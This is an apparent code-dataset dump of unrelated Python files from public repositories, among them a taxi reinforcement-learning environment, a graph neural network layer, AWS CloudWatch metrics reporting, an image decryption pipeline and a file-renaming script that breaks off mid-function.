max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
nxapi_plumbing/__init__.py | princesethi16/nxapi-plumbing | 8 | 12764951 | from nxapi_plumbing.device import Device
from nxapi_plumbing.api_client import RPCClient, XMLClient
from nxapi_plumbing.errors import (
NXAPIError,
NXAPICommandError,
NXAPIConnectionError,
NXAPIAuthError,
NXAPIPostError,
NXAPIXMLError,
)
__version__ = "0.5.2"
__all__ = (
"Device",
"RPCClient",
"XMLClient",
"NXAPIError",
"NXAPICommandError",
"NXAPIConnectionError",
"NXAPIAuthError",
"NXAPIPostError",
"NXAPIXMLError",
)
| 1.601563 | 2 |
colosseum/mdps/taxi/taxi.py | MichelangeloConserva/Colosseum | 0 | 12764952 | <filename>colosseum/mdps/taxi/taxi.py
from abc import ABC
from copy import deepcopy
from dataclasses import asdict, dataclass
from enum import IntEnum
from colosseum.utils.random_vars import deterministic, get_dist
try:
from functools import cached_property
except:
from backports.cached_property import cached_property
from itertools import product
from typing import Any, Dict, List, Tuple, Type, Union
import numpy as np
from scipy.stats import beta, rv_continuous
from colosseum.mdps import MDP
from colosseum.mdps.base_mdp import NextStateSampler
from colosseum.utils.mdps import check_distributions
class TaxiAction(IntEnum):
"""The action available in the MiniGridEmpty MDP."""
MoveSouth = 0
MoveNorth = 1
MoveEast = 2
MoveWest = 3
PickUpPassenger = 4
DropOffPassenger = 5
@dataclass(frozen=True)
class TaxiNode:
X: int
Y: int
XPass: int
YPass: int
XDest: int
YDest: int
def __str__(self):
return f"X={self.X},Y={self.Y},XPass={self.XPass},YPass={self.YPass},XDest={self.XDest},YDest={self.YDest}"
class TaxiMDP(MDP, ABC):
@staticmethod
def testing_parameters() -> Dict[str, Tuple]:
t_params = MDP.testing_parameters()
t_params["size"] = (8, 10)
t_params["length"] = (1, 2)
t_params["width"] = (1, 2)
t_params["space"] = (1, 2)
t_params["n_locations"] = (4, 9)
t_params["make_reward_stochastic"] = (True, False)
return t_params
@staticmethod
def get_node_class() -> Type[TaxiNode]:
return TaxiNode
def __init__(
self,
seed: int,
size: int,
lazy: float = None,
randomize_actions: bool = True,
make_reward_stochastic=False,
length=2,
width=1,
space=1,
n_locations=2 ** 2,
optimal_mean_reward: float = 0.9,
sub_optimal_mean_reward: float = 0.2,
default_r: rv_continuous = None,
successfully_delivery_r: Union[Tuple, rv_continuous] = None,
failure_delivery_r: Union[Tuple, rv_continuous] = None,
**kwargs,
):
"""
Parameters
----------
seed : int
the seed used for sampling rewards and next states.
randomize_actions : bool, optional
whether the effect of the actions changes for every node. It is particularly important to set this value to
true when doing experiments to avoid immediately reaching highly rewarding states in some MDPs by just
selecting the same action repeatedly. By default, it is set to true.
lazy : float
the probability of an action not producing any effect on the MDP.
size : int
the size of the grid.
make_reward_stochastic : bool, optional
checks whether the rewards are to be made stochastic. By default, it is set to False.
length : int, optional
the length of the walls. By default, it is set to two.
width : int, optional
the width of the walls. By default, it is set to one.
space : int, optional
the space between walls. By default, it is set to one.
n_locations : int, optional
the number of locations in which the passenger and the destination can spawn. By default, it is set to four.
optimal_mean_reward : float, optional
if the rewards are made stochastic, this parameter controls the mean reward for the highly rewarding states.
By default, it is set to 0.9.
sub_optimal_mean_reward: float, optional
if the rewards are made stochastic, this parameter controls the mean reward for the suboptimal states.
By default, it is set to 0.2.
default_r: Union[Tuple, rv_continuous]
The reward distribution for moving and picking up passengers. It can be either passed as a tuple containing
Beta parameters or as a rv_continuous object.
successfully_delivery_r: Union[Tuple, rv_continuous]
The reward distribution for successfully delivering a passenger. It can be either passed as a tuple
containing Beta parameters or as a rv_continuous object.
failure_delivery_r: Union[Tuple, rv_continuous]
The reward distribution for failing to deliver a passenger.It can be either passed as a tuple containing
Beta parameters or as a rv_continuous object.
"""
if type(successfully_delivery_r) == tuple:
successfully_delivery_r = get_dist(
successfully_delivery_r[0], successfully_delivery_r[1:]
)
if type(failure_delivery_r) == tuple:
failure_delivery_r = get_dist(failure_delivery_r[0], failure_delivery_r[1:])
if type(default_r) == tuple:
default_r = get_dist(default_r[0], default_r[1:])
randomize_actions = False # There is a bug when this is set to False. Not very important since there are many actions.
self.sub_optimal_mean_reward = sub_optimal_mean_reward
self.optimal_mean_reward = optimal_mean_reward
self.n_locations = n_locations
self._n_locations = int(np.ceil(n_locations ** 0.5) ** 2)
self.space = space
self.width = width
self.length = length
self.size = size
self.make_reward_stochastic = make_reward_stochastic
dists = [default_r, successfully_delivery_r, failure_delivery_r]
if dists.count(None) == 0:
self.default_r = default_r
self.successfully_delivery_r = successfully_delivery_r
self.failure_delivery_r = failure_delivery_r
else:
if make_reward_stochastic:
self.default_r = beta(1, 1 / sub_optimal_mean_reward - 1)
self.successfully_delivery_r = beta(1, 1 / optimal_mean_reward - 1)
self.failure_delivery_r = beta(1, 10 / sub_optimal_mean_reward - 1)
else:
self.default_r = deterministic(0.1)
self.successfully_delivery_r = deterministic(1)
self.failure_delivery_r = deterministic(0)
super().__init__(
seed=seed,
lazy=lazy,
randomize_actions=randomize_actions,
size=size,
**kwargs,
)
@property
def parameters(self) -> Dict[str, Any]:
return {
**super(TaxiMDP, self).parameters,
**dict(
size=self.size,
length=self.length,
width=self.width,
space=self.space,
n_locations=self.n_locations,
optimal_mean_reward=self.optimal_mean_reward,
sub_optimal_mean_reward=self.sub_optimal_mean_reward,
default_r=self.default_r,
successfully_delivery_r=self.successfully_delivery_r,
failure_delivery_r=self.failure_delivery_r,
),
}
@property
def _quadrant_width(self):
return self.size / int(self._n_locations ** 0.5) / 2
@cached_property
def _admissible_coordinate(self):
rows = []
j = 0
while len(rows) < self.size:
if j % 2 != 0:
row = []
else:
row = [0] * int((self.width + self.space) // 2)
i = 0
while len(row) < self.size:
row.append(int(i % (1 + self.space) == 0))
if row[-1] == 1:
for _ in range(self.width - 1):
if len(row) == self.size:
break
row.append(1)
i += 1
for _ in range(self.length):
if len(rows) == self.size:
break
rows.append(row)
if len(rows) < self.size:
rows.append([0] * self.size)
j += 1
return np.vstack(np.where(np.array(rows) == 0)).T.tolist()
@cached_property
def _quadrants(self):
quadrants = np.zeros((self.size, self.size))
split = np.array_split(range(self.size), int(self._n_locations ** 0.5))
for i, (x, y) in enumerate(product(split, split)):
for q_coo_x, q_coo_y in product(x, y):
quadrants[q_coo_x, q_coo_y] = i
quadrants = [
list(
filter(
lambda x: x in self._admissible_coordinate,
np.vstack(np.where(quadrants == i)).T.tolist(),
)
)
for i in range(self._n_locations)
]
assert all(len(q) != 0 for q in quadrants)
return quadrants
@cached_property
def locations(self):
re_sample = True
min_distance = max(self._quadrant_width, 2)
while re_sample:
locations = [
self._quadrants[i][self._rng.randint(len(self._quadrants[i]))]
for i in range(self._n_locations)
]
re_sample = False
nplocations = np.array(locations)
for i in range(self._n_locations):
for j in range(1 + i, self._n_locations):
diff = np.sqrt(((nplocations[i] - nplocations[j]) ** 2).sum())
if diff <= min_distance:
re_sample = True
break
if re_sample:
break
self._rng.shuffle(locations)
return locations[: self.n_locations]
@property
def possible_starting_nodes(self) -> List[TaxiNode]:
return self.starting_node_sampler.next_states
@property
def num_actions(self):
return len(TaxiAction)
def _calculate_next_nodes_prms(
self, node: TaxiNode, action: int
) -> Tuple[Tuple[dict, float], ...]:
next_node_prms = asdict(node)
if action == TaxiAction.DropOffPassenger:
# we have the passenger and we are dropping h(er/im) in the right place
if node.XPass == -1 and node.X == node.XDest and node.Y == node.YDest:
next_nodes_prms = []
n = 0
for pass_loc in filter(
lambda loc: loc != [node.X, node.Y],
self.locations,
):
n += len(list(filter(lambda loc: loc != pass_loc, self.locations)))
p = 1.0 / n
for pass_loc in filter(
lambda loc: loc != [node.X, node.Y],
self.locations,
):
admissible_destinations = list(
filter(lambda loc: loc != pass_loc, self.locations)
)
for destination in admissible_destinations:
cur_next_node_prms: dict = deepcopy(next_node_prms)
(
cur_next_node_prms["XPass"],
cur_next_node_prms["YPass"],
) = pass_loc
(
cur_next_node_prms["XDest"],
cur_next_node_prms["YDest"],
) = destination
next_nodes_prms.append((cur_next_node_prms, p))
return tuple(next_nodes_prms)
if action == TaxiAction.PickUpPassenger:
if node.XPass != -1 and node.X == node.XPass and node.Y == node.YPass:
next_node_prms["XPass"] = -1
next_node_prms["YPass"] = -1
if action == TaxiAction.MoveNorth:
next_coord = [node.X, node.Y + 1]
elif action == TaxiAction.MoveEast:
next_coord = [node.X + 1, node.Y]
elif action == TaxiAction.MoveSouth:
next_coord = [node.X, node.Y - 1]
elif action == TaxiAction.MoveWest:
next_coord = [node.X - 1, node.Y]
else:
next_coord = [node.X, node.Y]
if next_coord in self._admissible_coordinate:
next_node_prms["X"] = next_coord[0]
next_node_prms["Y"] = next_coord[1]
return ((next_node_prms, 1.0),)
def _calculate_reward_distribution(
self,
node: TaxiNode,
action: IntEnum,
next_node: TaxiNode,
) -> rv_continuous:
if action == TaxiAction.PickUpPassenger:
if next_node.XPass != -1 or node.XPass == -1:
# We don't have the passenger
return self.failure_delivery_r
if action == TaxiAction.DropOffPassenger:
if next_node.XPass == -1 or node.XPass != -1:
# We didn't drop the passenger in the destination
return self.failure_delivery_r
elif node.XPass == -1 and next_node.XPass != -1:
return self.successfully_delivery_r
return self.default_r
def _check_input_parameters(self):
super(TaxiMDP, self)._check_input_parameters()
assert (
self.failure_delivery_r.mean()
< self.default_r.mean()
< self.successfully_delivery_r.mean()
)
assert self.size > 3
assert self.n_locations > (1 if self.is_episodic() else 2)
assert self.size > self.length
assert self.size > self.width
assert self.size > self.space / 2
assert self.size > 2 * self.n_locations ** 0.5
assert self.optimal_mean_reward - 0.1 > self.sub_optimal_mean_reward
if self.lazy:
assert self.lazy <= 0.9
dists = [
self.default_r,
self.failure_delivery_r,
self.successfully_delivery_r,
]
check_distributions(
dists,
self.make_reward_stochastic,
)
def _instantiate_starting_node_sampler(self) -> NextStateSampler:
starting_nodes = []
for (
(pass_loc_x, pass_loc_y),
(destination_x, destination_y),
(taxi_x, taxi_y),
) in product(self.locations, self.locations, self._admissible_coordinate):
if (pass_loc_x, pass_loc_y) == (destination_x, destination_y):
continue
starting_nodes.append(
TaxiNode(
taxi_x, taxi_y, pass_loc_x, pass_loc_y, destination_x, destination_y
)
)
self._rng.shuffle(starting_nodes)
return NextStateSampler(
next_states=starting_nodes,
probs=[1 / len(starting_nodes) for _ in range(len(starting_nodes))],
seed=self._next_seed(),
)
def calc_grid_repr(self, node: Any) -> np.array:
grid = np.zeros((self.size, self.size), dtype=str)
grid[:, :] = "X"
for coo_x, coo_y in self._admissible_coordinate:
grid[coo_x, coo_y] = " "
grid[node.XDest, node.YDest] = "D"
if node.XPass != -1:
grid[node.XPass, node.YPass] = "P"
grid[node.X, node.Y] = "A"
return grid[::-1, :]
| 2.390625 | 2 |
tests/test_bearer_auth.py | neuro-inc/neuro-auth-client | 0 | 12764953 | <gh_stars>0
import pytest
from neuro_auth_client.bearer_auth import BearerAuth
class TestBearerAuth:
def test_decode_unexpected_scheme(self) -> None:
with pytest.raises(ValueError, match="Unexpected authorization scheme"):
BearerAuth.decode("Basic credentials")
@pytest.mark.parametrize("header_value", ("Bearer", "Bearer "))
def test_decode_no_credentials(self, header_value: str) -> None:
with pytest.raises(ValueError, match="No credentials"):
BearerAuth.decode(header_value)
@pytest.mark.parametrize("token", ("token", "to <PASSWORD>"))
def test_decode(self, token: str) -> None:
auth = BearerAuth.decode("Bearer " + token)
assert auth == BearerAuth(token=token)
def test_encode(self) -> None:
assert BearerAuth(token="token").encode() == "Bearer token"
| 2.3125 | 2 |
attitude/display/cartopy.py | davenquinn/Attitude | 8 | 12764954 | """
Functions to plot data using the `cartopy` library.
These require the `shapely` and `cartopy` libraries to be installed.
CartoPy is sometimes difficult to install.
"""
import numpy as N
from cartopy import crs, feature
from shapely.geometry import Polygon
from ..error.axes import hyperbolic_axes
from ..stereonet import plane_errors, normal_errors
def fix_stereonet_coords(coords):
coords[:,1] *= -1
return coords
def cartopy_girdle(fit, **kw):
d = hyperbolic_axes(fit,**kw)
cm = N.diag(d)
sheets = {i: N.degrees(plane_errors(fit.axes, cm, sheet=i))
for i in ('upper','lower')}
geom = Polygon(sheets['upper'], [sheets['lower'][::-1]])
geometries = [geom]
return feature.ShapelyFeature(geometries, crs.PlateCarree())
def cartopy_normal(fit, **kw):
d = hyperbolic_axes(fit,**kw)
cm = N.diag(d)
upper = N.degrees(normal_errors(fit.axes, cm))
geom = Polygon(upper)
geometries = [geom]
return feature.ShapelyFeature(geometries, crs.PlateCarree())
| 3.078125 | 3 |
python/graph2tensor/model/layers/gin_layer.py | deepest-stack/graph2tensor | 0 | 12764955 | <reponame>deepest-stack/graph2tensor
#!/usr/bin/env python3
import tensorflow as tf
class GINConv(tf.keras.layers.Layer):
r"""
Graph Isomorphism Network layer.
.. math::
h_v^{(k)} = MLP^{(k)}((1+\epsilon^{(k)}) \cdot h_v^{(k-1)}
+ aggr(\{h_u^{(k-1)},{u\in \mathcal{N}(v)}\})
or
.. math::
h_v^{(k)} = MLP^{(k)}((1+\epsilon^{(k)}) \cdot h_v^{(k-1)}
+ aggr(\{w_{uv}h_u^{(k-1)},{u\in \mathcal{N}(v)}\})
if edge weight is available
:param init_eps: the initial epsilon value, default to 0
:param aggr_type: how to aggregate message from neighbours, expected "max", "mean"
or "sum", default to "max"
:param mlp_units: `int` or `list` of integer, the units of each layer in mlp, an
`int` value will define a 1-layer mlp, default to 32
:param mlp_activations: `str` or `tf.keras.activations` object, or list of it, the
activation of each layer in mlp, default to linear activation
:param kwargs: args passed to `tf.keras.layers.Layer`
"""
def __init__(self, init_eps=.0, aggr_type='max', mlp_units=32, mlp_activations=None, **kwargs):
super(GINConv, self).__init__(**kwargs)
self.init_eps = init_eps
self.eps = self.add_weight(
name="epsilon",
trainable=True,
shape=(1,),
initializer=tf.constant_initializer(init_eps)
)
self.aggr_type = aggr_type
if self.aggr_type.upper() not in ("MAX", "MEAN", "SUM"):
self.aggr_type = "max"
raise Warning("Unrecognized `aggr_type`: %s, 'max' aggregation"
" will be applied." % (aggr_type, ))
if not isinstance(mlp_units, list):
mlp_units = [mlp_units]
if not isinstance(mlp_activations, list):
mlp_activations = [mlp_activations]
if len(mlp_units) != len(mlp_activations):
if len(mlp_units) == 1:
mlp_units = mlp_units * len(mlp_activations)
elif len(mlp_activations) == 1:
mlp_activations = mlp_activations * len(mlp_units)
else:
raise ValueError("`mlp_units` and `mlp_activations` should have same length")
self.mlp_layers = [
tf.keras.layers.Dense(units, activation=activation)
for units, activation in zip(mlp_units, mlp_activations)
]
def get_config(self):
mlp_units, mlp_activations = [], []
for layer in self.mlp_layers:
config = layer.get_config()
mlp_units.append(config["units"])
mlp_activations.append(config["activation"])
config = super(GINConv, self).get_config()
config.update(
{
"init_eps": self.init_eps,
"mlp_units": mlp_units,
"mlp_activations": mlp_activations
}
)
return config
def call(self, inputs, **kwargs):
src, edge_weight, dst, segment_ids = inputs
if kwargs.get("edge_weighted", False):
dst = dst * edge_weight
if self.aggr_type.upper() == "MAX":
x = tf.math.segment_max(dst, tf.squeeze(segment_ids))
elif self.aggr_type.upper() == "MEAN":
x = tf.math.segment_mean(dst, tf.squeeze(segment_ids))
else:
x = tf.math.segment_sum(dst, tf.squeeze(segment_ids))
x = x + (1 + self.eps) * src
for layer in self.mlp_layers:
x = layer(x)
return x
def explain_call(self, inputs):
src, edge, dst, segment_ids, weights = inputs
dst = tf.multiply(dst, tf.reshape(weights, (-1, 1)))
return self.call((src, edge, dst, segment_ids))
if __name__ == "__main__":
pass
| 2.796875 | 3 |
src/logs/self_monitoring/sfm.py | equardo/dynatrace-aws-log-forwarder | 0 | 12764956 | # Copyright 2021 Dynatrace LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict
from typing import Union
import boto3
class SelfMonitoringContext:
def __init__(self, function_name):
self._function_name = function_name
self._kinesis_records_age = []
self._record_data_compressed_size = []
self._record_data_decompressed_size = []
self._log_entries_by_log_group = defaultdict(lambda: 0)
self._log_content_len_by_log_group = defaultdict(lambda: 0)
self._batches_prepared = 0
self._log_entries_prepared = 0
self._data_volume_prepared = 0
self._batches_delivered = 0
self._log_entries_delivered = 0
self._data_volume_delivered = 0
self._issue_count_by_type = defaultdict(lambda: 0)
self._log_content_trimmed = 0
self._log_attr_trimmed = 0
self._logs_age_min_sec = None
self._logs_age_avg_sec = None
self._logs_age_max_sec = None
self._requests_sent = 0
self._requests_durations_ms = []
self._requests_count_by_status_code = defaultdict(lambda: 0)
def kinesis_record_age(self, age_sec):
self._kinesis_records_age.append(age_sec)
def kinesis_record_decoded(self, record_data_compressed_size, record_data_decompressed_size):
self._record_data_compressed_size.append(record_data_compressed_size)
self._record_data_decompressed_size.append(record_data_decompressed_size)
def single_record_transformed(self, log_group, log_entries_count, log_content_len):
self._log_entries_by_log_group[log_group] += log_entries_count
self._log_content_len_by_log_group[log_group] += log_content_len
def batch_prepared(self, log_entries_count, data_volume):
self._batches_prepared += 1
self._log_entries_prepared += log_entries_count
self._data_volume_prepared += data_volume
def batch_delivered(self, log_entries_count, data_volume):
self._batches_delivered += 1
self._log_entries_delivered += log_entries_count
self._data_volume_delivered += data_volume
def issue(self, what_issue):
self._issue_count_by_type[what_issue] += 1
print("SFM: issue registered, type " + what_issue)
def log_content_trimmed(self):
self._log_content_trimmed += 1
def log_attr_trimmed(self):
self._log_attr_trimmed += 1
def logs_age(self, logs_age_min_sec, logs_age_avg_sec, logs_age_max_sec):
self._logs_age_min_sec = logs_age_min_sec
self._logs_age_avg_sec = logs_age_avg_sec
self._logs_age_max_sec = logs_age_max_sec
def request_sent(self):
self._requests_sent += 1
def request_finished_with_status_code(self, status_code, duration_ms):
self._requests_count_by_status_code[status_code] += 1
self._requests_durations_ms.append(duration_ms)
def _generate_metrics(self):
metrics = []
common_dimensions = [{
"Name": "function_name",
"Value": self._function_name,
}]
metrics.append(_prepare_cloudwatch_metric(
"Kinesis record age", self._kinesis_records_age, "Seconds", common_dimensions))
metrics.append(_prepare_cloudwatch_metric(
"Kinesis record.data compressed size", self._record_data_compressed_size, "Bytes", common_dimensions))
metrics.append(_prepare_cloudwatch_metric(
"Kinesis record.data decompressed size", self._record_data_decompressed_size, "Bytes", common_dimensions))
# TO BE RESTORED IN DIFFERENT WAY IN APM-306046
# please remove this then
# for log_group, log_entries_count in self._log_entries_by_log_group.items():
# metrics.append(_prepare_cloudwatch_metric(
# "Log entries by LogGroup", log_entries_count, "None",
# common_dimensions + [{"Name": "log_group", "Value": log_group}]
# ))
#
# for log_group, log_content_len in self._log_content_len_by_log_group.items():
# metrics.append(_prepare_cloudwatch_metric(
# "Log content length by LogGroup", log_content_len, "None",
# common_dimensions + [{"Name": "log_group", "Value": log_group}]
# ))
metrics.append(_prepare_cloudwatch_metric(
"Batches prepared", self._batches_prepared, "None", common_dimensions))
metrics.append(_prepare_cloudwatch_metric(
"Log entries prepared", self._log_entries_prepared, "None", common_dimensions))
metrics.append(_prepare_cloudwatch_metric(
"Data volume prepared", self._data_volume_prepared, "Bytes", common_dimensions))
metrics.append(_prepare_cloudwatch_metric(
"Batches delivered", self._batches_delivered, "None", common_dimensions))
metrics.append(_prepare_cloudwatch_metric(
"Log entries delivered", self._log_entries_delivered, "None", common_dimensions))
metrics.append(_prepare_cloudwatch_metric(
"Data volume delivered", self._data_volume_delivered, "Bytes", common_dimensions))
for issue, count in self._issue_count_by_type.items():
metrics.append(_prepare_cloudwatch_metric(
"Issues", count, "None",
common_dimensions + [{"Name": "type", "Value": issue}]
))
metrics.append(_prepare_cloudwatch_metric(
"Log content trimmed", self._log_content_trimmed, "None", common_dimensions))
metrics.append(_prepare_cloudwatch_metric(
"Log attr trimmed", self._log_attr_trimmed, "None", common_dimensions))
if self._logs_age_min_sec:
metrics.append(_prepare_cloudwatch_metric(
"Log age min", self._logs_age_min_sec, "Seconds", common_dimensions))
metrics.append(_prepare_cloudwatch_metric(
"Log age avg", self._logs_age_avg_sec, "Seconds", common_dimensions))
metrics.append(_prepare_cloudwatch_metric(
"Log age max", self._logs_age_max_sec, "Seconds", common_dimensions))
metrics.append(_prepare_cloudwatch_metric(
"Requests sent", self._requests_sent, "None", common_dimensions))
if self._requests_durations_ms:
metrics.append(_prepare_cloudwatch_metric(
"Requests duration", self._requests_durations_ms, "Milliseconds", common_dimensions))
for status_code, count in self._requests_count_by_status_code.items():
metrics.append(_prepare_cloudwatch_metric(
"Requests status code count", count, "None",
common_dimensions + [{"Name": "status_code", "Value": str(status_code)}]
))
return metrics
def push_sfm_to_cloudwatch(self):
metrics = self._generate_metrics()
cloudwatch = boto3.client('cloudwatch')
try:
for i in range(0, len(metrics), 20):
metrics_batch = metrics[i:(i + 20)]
cloudwatch.put_metric_data(MetricData=metrics_batch, Namespace='DT/LogsStreaming')
except Exception as e:
print("Print metrics on SFM push failure: " + str(metrics))
raise e
def _prepare_cloudwatch_metric(metric_name, value: Union[int, float, list], unit, dimensions) -> dict:
cw_metric = {
'MetricName': metric_name,
'Dimensions': dimensions,
'Unit': unit,
}
if isinstance(value, list):
cw_metric["Values"] = value
else:
cw_metric["Value"] = value
return cw_metric
| 1.726563 | 2 |
infoxlm/src-infoxlm/infoxlm/models/__init__.py | Sanster/unilm | 5,129 | 12764957 | import argparse
import importlib
import os
from fairseq.models import MODEL_REGISTRY, ARCH_MODEL_INV_REGISTRY
# automatically import any Python files in the models/ directory
models_dir = os.path.dirname(__file__)
for file in os.listdir(models_dir):
path = os.path.join(models_dir, file)
if not file.startswith('_') and not file.startswith('.') and (file.endswith('.py') or os.path.isdir(path)):
model_name = file[:file.find('.py')] if file.endswith('.py') else file
module = importlib.import_module('infoxlm.models.' + model_name)
# extra `model_parser` for sphinx
if model_name in MODEL_REGISTRY:
parser = argparse.ArgumentParser(add_help=False)
group_archs = parser.add_argument_group('Named architectures')
group_archs.add_argument('--arch', choices=ARCH_MODEL_INV_REGISTRY[model_name])
group_args = parser.add_argument_group('Additional command-line arguments')
MODEL_REGISTRY[model_name].add_args(group_args)
globals()[model_name + '_parser'] = parser
| 2.296875 | 2 |
official/projects/unified_detector/data_conversion/convert.py | Lufeifeina/models | 1 | 12764958 | # Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Script to convert HierText to TFExamples.
This script is only intended to run locally.
python3 data_preprocess/convert.py \
--gt_file=/path/to/gt.jsonl \
--img_dir=/path/to/image \
--out_file=/path/to/tfrecords/file-prefix
"""
import json
import os
import random
from absl import app
from absl import flags
import tensorflow as tf
import tqdm
import utils
_GT_FILE = flags.DEFINE_string('gt_file', None, 'Path to the GT file')
_IMG_DIR = flags.DEFINE_string('img_dir', None, 'Path to the image folder.')
_OUT_FILE = flags.DEFINE_string('out_file', None, 'Path for the tfrecords.')
_NUM_SHARD = flags.DEFINE_integer(
'num_shard', 100, 'The number of shards of tfrecords.')
def main(unused_argv) -> None:
annotations = json.load(open(_GT_FILE.value))['annotations']
random.shuffle(annotations)
n_sample = len(annotations)
n_shards = _NUM_SHARD.value
n_sample_per_shard = (n_sample - 1) // n_shards + 1
for shard in tqdm.tqdm(range(n_shards)):
output_path = f'{_OUT_FILE.value}-{shard:05}-{n_shards:05}.tfrecords'
annotation_subset = annotations[
shard * n_sample_per_shard : (shard + 1) * n_sample_per_shard]
with tf.io.TFRecordWriter(output_path) as file_writer:
for annotation in annotation_subset:
img_file_path = os.path.join(_IMG_DIR.value,
f"{annotation['image_id']}.jpg")
tfexample = utils.convert_to_tfe(img_file_path, annotation)
file_writer.write(tfexample)
if __name__ == '__main__':
flags.mark_flags_as_required(['gt_file', 'img_dir', 'out_file'])
app.run(main)
| 2 | 2 |
henon_arnold/decrypt.py | Xus72/Encriptacion-caotica | 0 | 12764959 | <reponame>Xus72/Encriptacion-caotica<filename>henon_arnold/decrypt.py
import os
import henon_arnold.diffusion as dif
from PIL import ImageTk, Image
import henon_arnold.confusion as con
import henon_arnold.reshape as res
import cv2
import henon_arnold.Image as i
import time
def decrypt(filepath, destination_path, key):
im_encrypted = i.Image(filepath, i.Type.ENCRYPTED, cv2.imread(filepath, cv2.IMREAD_UNCHANGED), key)
print(im_encrypted.filename)
path = os.path.join('.', 'images')
#begin undiffusion
im_undiffused = i.Image(path+"\\undiffused\\"+im_encrypted.filename.split('.')[0]+".png", i.Type.UNDIFFUSED, dif.pixelManipulation(im_encrypted), key)
#uncomment code below to save the output of undiffusion
# cv2.imwrite(im_undiffused.filepath, im_undiffused.matrix)
#begin unconfusion
start_time = time.perf_counter()
im_unconfused = i.Image(path+"\\unconfused\\"+im_encrypted.filename.split('.')[0]+".png", i.Type.UNCONFUSED, con.reconstructArnoldMap(im_undiffused), key)
elapsed_time = time.perf_counter() - start_time
print(f"Elapsed time: {elapsed_time:0.4f} seconds")
#uncomment code below to save the output of unconfusion
# cv2.imwrite(im_unconfused.filepath, im_unconfused.matrix)
#reshape crop border
start_time = time.perf_counter()
if os.name == "posix":
im_decrypted = i.Image(destination_path+"/"+im_encrypted.filename.split('.')[0]+".png", i.Type.DECRYPTED, res.cropBorder(im_unconfused), key)
else:
im_decrypted = i.Image(destination_path+"\\"+im_encrypted.filename.split('.')[0]+".png", i.Type.DECRYPTED, res.cropBorder(im_unconfused), key)
elapsed_time = time.perf_counter() - start_time
print(f"Elapsed time: {elapsed_time:0.4f} seconds")
cv2.imwrite(im_decrypted.filepath, im_decrypted.matrix)
| 2.828125 | 3 |
main/migrations/0018_dmis_reponse_tools.py | IFRCGo/ifrcgo_react | 0 | 12764960 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-28 18:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0017_auto_20161123_2339'),
]
operations = [
migrations.CreateModel(
name='Dmis_reponse_tools',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ReportID', models.IntegerField()),
('RIT', models.CharField(max_length=255)),
('RDRT', models.CharField(max_length=255)),
('FACT', models.CharField(max_length=255)),
('ERU', models.CharField(max_length=255)),
('RFL', models.CharField(max_length=255)),
],
),
]
| 1.632813 | 2 |
tests/test_plants_pineapple.py | nielse63/PiPlanter | 0 | 12764961 | import pyplanter.plants.pineapple
def test_plants_pineapple():
pass
| 0.984375 | 1 |
projectile_motion/__init__.py | trungleduc/projectile-motion | 0 | 12764962 | <filename>projectile_motion/__init__.py
"""CoSApp project Projectile Motion
Projectile Motion Simulation
"""
from ._version import __version__
def find_resources(filename: str = "") -> str:
"""Returns the fullpath of a file in resources folder.
Parameters
----------
filename: str, optional
File or directory looked for; default resources folder
Returns
-------
str
Full path to resources
"""
import os
fullpath = os.path.realpath(os.path.join(__path__[0], "resources", filename))
if not os.path.exists(fullpath):
raise FileNotFoundError(fullpath)
return fullpath
def _cosapp_lab_load_module():
from projectile_motion.systems import ProjectileMotion
from cosapp_lab.widgets import SysExplorer
s = ProjectileMotion("s")
s.run_once()
a = SysExplorer(s, template = find_resources('ui.json'))
def _cosapp_lab_module_meta():
return {"title": "Projectile Motion Demo", "description": "Projectile motion modelling demo", "version": "0.1.0"}
__all__ = ["drivers", "ports", "systems", "tools"]
| 2.78125 | 3 |
change_name_recurse.py | imoyao/WIKI | 5 | 12764963 | <reponame>imoyao/WIKI
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by Administrator at 2020/12/12 20:48
"""
该脚本会递归替换执行目录下的文件名称
在要批处理的目录的上级运行该脚本
1. 如果没有给定ROOT_PATH,则直接以脚本所在目录为root
2. 否则,以用户给定为准
3. 我们可以给定rename的多个根目录,也可以直接以root为根目录,取决于你的“一级目录”是否很多
"""
import os
import pathlib
import re
current_path = os.path.dirname(os.path.abspath(__file__))
# 需要处理目录的绝对路径
ROOT_PATH = os.path.join(current_path, 'docs')
EXCLUDE_DIR = ['.vuepress', '@pages', '_posts', 'styles', 'images']
START_REMOVE_LISTS = ['.', '-', '_']
def get_exclude_children(exclude_dir):
"""
获取被排除目录的子目录并添加到子目录中
:param exclude_dir: str,文件路径名称
:return: set,文件路径名称
"""
origin_dir = exclude_dir[:]
file_list = []
for _dir in exclude_dir:
exclude_dir_children = os.path.join(ROOT_PATH, _dir)
for root, dirs, files in os.walk(exclude_dir_children):
origin_dir.extend(dirs)
file_list.extend(files)
return set(origin_dir), set(file_list)
def reg_startswith(check_str, reg):
"""
10.foo.md >>> re.match.obj
bar >>> None
:param check_str:str,被检查字符
:param reg:str,正则表达式
:return:匹配对象或None对象或None
"""
return re.match(fr'^{reg}', check_str)
def is_md_file(file_path):
"""
指定文件是md文件
:param file_path:
:return:
"""
return pathlib.PurePath(file_path).suffix[1:].lower() == 'md'
def full_path(_root, file):
return pathlib.PurePath(_root).joinpath(file)
def order_file_list_by_ctime(root, file_lists):
"""
文件以创建时间排序
:param root:
:param file_lists:
:return:
"""
